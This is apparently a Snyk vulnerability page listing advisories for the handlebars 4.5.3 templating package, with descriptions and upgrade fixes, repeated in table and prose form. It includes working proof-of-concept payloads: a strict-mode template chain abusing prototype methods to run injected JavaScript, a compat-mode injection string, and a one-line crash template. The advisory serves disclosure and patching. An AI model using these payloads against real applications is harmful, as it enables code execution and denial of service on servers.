handlebars 4.5.3

Direct Vulnerabilities

Known vulnerabilities in the handlebars package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
M Time-of-check Time-of-use (TOCTOU) Race Condition handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Time-of-check Time-of-use (TOCTOU) Race Condition in the `lookup` function. An attacker can access properties that should be restricted by bypassing prototype-access controls through a time-of-check time-of-use (TOCTOU) flaw, where the security check and the actual property access are decoupled. Note: This is only exploitable if the `{ compat: true }` compile option is enabled. How to fix Time-of-check Time-of-use (TOCTOU) Race Condition? Upgrade `handlebars` to version 4.7.9 or higher.	>=4.0.0 <4.7.9
H Improper Check for Unusual or Exceptional Conditions handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Improper Check for Unusual or Exceptional Conditions through the `registerDecorator` path in `lib/handlebars/compiler/javascript-compiler.js`. An attacker can crash the Node.js process by supplying a template with malformed or unregistered decorator syntax, causing the compiled template to call an undefined decorator as a function. This affects applications that compile untrusted templates at request time, especially when the compile/render call is not wrapped in `try/catch`. A single malicious template such as `{{*n}}` can trigger an unhandled `TypeError` and terminate the process. How to fix Improper Check for Unusual or Exceptional Conditions? Upgrade `handlebars` to version 4.7.9 or higher.	>=4.0.0 <4.7.9
H Improper Encoding or Escaping of Output handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output through the CLI precompiler in `lib/precompiler.js`. An attacker can execute arbitrary JavaScript in the generated bundle by supplying crafted template filenames or CLI options such as `--namespace`, `--commonjs`, `--handlebarPath`, or `--map`. The issue affects the precompiler output path used by `bin/handlebars` / `lib/precompiler.js`, where untrusted names and option values were concatenated into emitted JavaScript without escaping. How to fix Improper Encoding or Escaping of Output? Upgrade `handlebars` to version 4.7.9 or higher.	>=4.0.0 <4.7.9
C Access of Resource Using Incompatible Type ('Type Confusion') handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via the `resolvePartial` and `invokePartial` functions. An attacker can execute arbitrary code on the server by supplying a crafted object as a dynamic partial in the template context, which is then compiled and executed as JavaScript. Note: This is only exploitable if the template uses dynamic partial lookups and the attacker can control the context property used for the lookup. How to fix Access of Resource Using Incompatible Type ('Type Confusion')? Upgrade `handlebars` to version 4.7.9 or higher.	>=4.0.0 <4.7.9
C Access of Resource Using Incompatible Type ('Type Confusion') handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via the `compile` function. An attacker can execute arbitrary code by supplying a crafted Abstract Syntax Tree (AST) object with a malicious `NumberLiteral` value, which is emitted directly into generated JavaScript code without proper sanitization. Note: This allows the attacker to inject and run arbitrary commands on the server. This is only exploitable if user-controlled JSON is deserialized and passed directly to the `compile` function. How to fix Access of Resource Using Incompatible Type ('Type Confusion')? Upgrade `handlebars` to version 4.7.9 or higher.	>=4.0.0 <4.7.9
C Access of Resource Using Incompatible Type ('Type Confusion') handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via manipulation of the `@partial-block` variable in the template data context. An attacker can execute arbitrary JavaScript code on the server by overwriting `@partial-block` with a crafted Handlebars AST and triggering its evaluation through a subsequent invocation. Note: This is only exploitable if helpers that accept arbitrary objects are registered and allow mutation of the data context. How to fix Access of Resource Using Incompatible Type ('Type Confusion')? Upgrade `handlebars` to version 4.7.9 or higher.	>=4.0.0 <4.7.9
L Prototype Pollution handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Prototype Pollution via the `resolvePartial` function. An attacker can inject malicious scripts into rendered output by polluting `Object.prototype` with a key matching a partial reference, causing unescaped content to be rendered. Note: This is only exploitable if the attacker knows or can guess the name of a partial reference used in a template. How to fix Prototype Pollution? Upgrade `handlebars` to version 4.7.9 or higher.	>=4.0.0 <4.7.9
M Prototype Pollution handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source. POC <script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> <script> // compile the template var s2 = `{{'a/.") \|\| alert("Vulnerable Handlebars JS when compiling in compat mode'}}`; var template = Handlebars.compile(s2, { compat: true }); // execute the compiled template and print the output to the console console.log(template({})); </script> How to fix Prototype Pollution? Upgrade `handlebars` to version 4.7.7 or higher.	<4.7.7
H Remote Code Execution (RCE) handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source. POC <script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> <script> // compile the template var s = ` {{#with (__lookupGetter__ "__proto__")}} {{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} {{#with ../constructor.prototype}} {{../../constructor.defineProperty . "hasOwnProperty" ..}} {{/with}} {{/with}} {{/with}} {{#with "constructor"}} {{#with split}} {{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}} {{#with .}} {{#with (concat (lookup join (slice 0 1)))}} {{#each (slice 2 3)}} {{#with (apply 0 ../..)}} {{.}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} `; var template = Handlebars.compile(s, { strict: true }); // execute the compiled template and print the output to the console console.log(template({})); </script> How to fix Remote Code Execution (RCE)? Upgrade `handlebars` to version 4.7.7 or higher.	<4.7.7
M Prototype Pollution handlebars is an extension to the Mustache templating language. Affected versions of this package are vulnerable to Prototype Pollution. Prototype access to the template engine allows for potential code execution. How to fix Prototype Pollution? Upgrade `handlebars` to version 4.6.0 or higher.	<4.6.0

Vulnerability

Vulnerable Version

Time-of-check Time-of-use (TOCTOU) Race Condition

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Time-of-check Time-of-use (TOCTOU) Race Condition in the lookup function. An attacker can access properties that should be restricted by bypassing prototype-access controls through a time-of-check time-of-use (TOCTOU) flaw, where the security check and the actual property access are decoupled.

Note: This is only exploitable if the { compat: true } compile option is enabled.

How to fix Time-of-check Time-of-use (TOCTOU) Race Condition?

Upgrade handlebars to version 4.7.9 or higher.

>=4.0.0 <4.7.9

Improper Check for Unusual or Exceptional Conditions

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Improper Check for Unusual or Exceptional Conditions through the registerDecorator path in lib/handlebars/compiler/javascript-compiler.js. An attacker can crash the Node.js process by supplying a template with malformed or unregistered decorator syntax, causing the compiled template to call an undefined decorator as a function. This affects applications that compile untrusted templates at request time, especially when the compile/render call is not wrapped in try/catch. A single malicious template such as {{*n}} can trigger an unhandled TypeError and terminate the process.

How to fix Improper Check for Unusual or Exceptional Conditions?

Upgrade handlebars to version 4.7.9 or higher.

>=4.0.0 <4.7.9

Improper Encoding or Escaping of Output

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output through the CLI precompiler in lib/precompiler.js. An attacker can execute arbitrary JavaScript in the generated bundle by supplying crafted template filenames or CLI options such as --namespace, --commonjs, --handlebarPath, or --map. The issue affects the precompiler output path used by bin/handlebars / lib/precompiler.js, where untrusted names and option values were concatenated into emitted JavaScript without escaping.

How to fix Improper Encoding or Escaping of Output?

Upgrade handlebars to version 4.7.9 or higher.

>=4.0.0 <4.7.9

Access of Resource Using Incompatible Type ('Type Confusion')

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via the resolvePartial and invokePartial functions. An attacker can execute arbitrary code on the server by supplying a crafted object as a dynamic partial in the template context, which is then compiled and executed as JavaScript.

Note: This is only exploitable if the template uses dynamic partial lookups and the attacker can control the context property used for the lookup.

How to fix Access of Resource Using Incompatible Type ('Type Confusion')?

Upgrade handlebars to version 4.7.9 or higher.

>=4.0.0 <4.7.9

Access of Resource Using Incompatible Type ('Type Confusion')

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via the compile function. An attacker can execute arbitrary code by supplying a crafted Abstract Syntax Tree (AST) object with a malicious NumberLiteral value, which is emitted directly into generated JavaScript code without proper sanitization.

Note: This allows the attacker to inject and run arbitrary commands on the server. This is only exploitable if user-controlled JSON is deserialized and passed directly to the compile function.

How to fix Access of Resource Using Incompatible Type ('Type Confusion')?

Upgrade handlebars to version 4.7.9 or higher.

>=4.0.0 <4.7.9

Access of Resource Using Incompatible Type ('Type Confusion')

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Access of Resource Using Incompatible Type ('Type Confusion') via manipulation of the @partial-block variable in the template data context. An attacker can execute arbitrary JavaScript code on the server by overwriting @partial-block with a crafted Handlebars AST and triggering its evaluation through a subsequent invocation.

Note: This is only exploitable if helpers that accept arbitrary objects are registered and allow mutation of the data context.

How to fix Access of Resource Using Incompatible Type ('Type Confusion')?

Upgrade handlebars to version 4.7.9 or higher.

>=4.0.0 <4.7.9

Prototype Pollution

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution via the resolvePartial function. An attacker can inject malicious scripts into rendered output by polluting Object.prototype with a key matching a partial reference, causing unescaped content to be rendered.

Note:

This is only exploitable if the attacker knows or can guess the name of a partial reference used in a template.

How to fix Prototype Pollution?

Upgrade handlebars to version 4.7.9 or higher.

>=4.0.0 <4.7.9

Prototype Pollution

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution when selecting certain compiling options to compile templates coming from an untrusted source.

POC

<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> 
<script> 
// compile the template 

var s2 = `{{'a/.") || alert("Vulnerable Handlebars JS when compiling in compat mode'}}`; 
var template = Handlebars.compile(s2, { 
compat: true 
}); 
// execute the compiled template and print the output to the console console.log(template({})); 
</script>

How to fix Prototype Pollution?

Upgrade handlebars to version 4.7.7 or higher.

<4.7.7

Remote Code Execution (RCE)

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) when selecting certain compiling options to compile templates coming from an untrusted source.

POC

<script src="https://cdn.jsdelivr.net/npm/handlebars@latest/dist/handlebars.js"></script> 
<script> 
// compile the template 
var s = ` 
{{#with (__lookupGetter__ "__proto__")}} 
{{#with (./constructor.getOwnPropertyDescriptor . "valueOf")}} 
{{#with ../constructor.prototype}} 
{{../../constructor.defineProperty . "hasOwnProperty" ..}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{#with "constructor"}} 
{{#with split}} 
{{pop (push "alert('Vulnerable Handlebars JS when compiling in strict mode');")}} 
{{#with .}} 
{{#with (concat (lookup join (slice 0 1)))}} 
{{#each (slice 2 3)}} 
{{#with (apply 0 ../..)}} 
{{.}} 
{{/with}} 
{{/each}} 
{{/with}} 
{{/with}} 
{{/with}} 
{{/with}} 
`;
var template = Handlebars.compile(s, { 
strict: true 
}); 
// execute the compiled template and print the output to the console console.log(template({})); 
</script>

How to fix Remote Code Execution (RCE)?

Upgrade handlebars to version 4.7.7 or higher.

<4.7.7

Prototype Pollution

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Prototype Pollution. Prototype access to the template engine allows for potential code execution.

How to fix Prototype Pollution?

Upgrade handlebars to version 4.6.0 or higher.

<4.6.0

handlebars@4.5.3

Handlebars provides the power necessary to let you build semantic templates effectively with no frustration

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically

POC

POC